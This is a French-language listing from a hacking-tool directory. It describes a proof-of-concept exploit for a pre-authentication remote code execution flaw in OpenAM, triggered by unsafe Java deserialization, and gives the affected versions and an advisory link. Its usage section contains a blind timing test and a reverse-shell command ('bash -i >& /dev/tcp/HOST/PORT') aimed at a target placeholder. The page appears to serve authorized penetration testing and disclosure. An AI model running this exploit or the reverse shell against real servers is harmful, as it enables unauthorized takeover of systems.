Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33439-Poc — PoC pour CVE-2026-33439, une RCE pré-auth dans OpenAM via une désérialisation Java non sécurisée. | Kitploit
Outils/GitHubGitHub/rh33t/cve-2026-33439-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

PoC pour CVE-2026-33439, une RCE pré-auth dans OpenAM via une désérialisation Java non sécurisée.

Voir le dépôt
il y a 15h 17mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33439

RCE pré-authentification dans OpenIdentityPlatform OpenAM via une désérialisation Java non sécurisée du paramètre jato.clientSession. Affecté <= 16.0.5, corrigé dans 16.0.6.

Avis : https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

Utilisation

root@kitploit:~
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

La sortie est aveugle. La requête se bloque jusqu'à ce que la commande se termine, donc le timing confirme l'exécution (--command 'sleep 5' prend environ 5s).

Pour des tests de sécurité autorisés uniquement.

Télécharger l’outil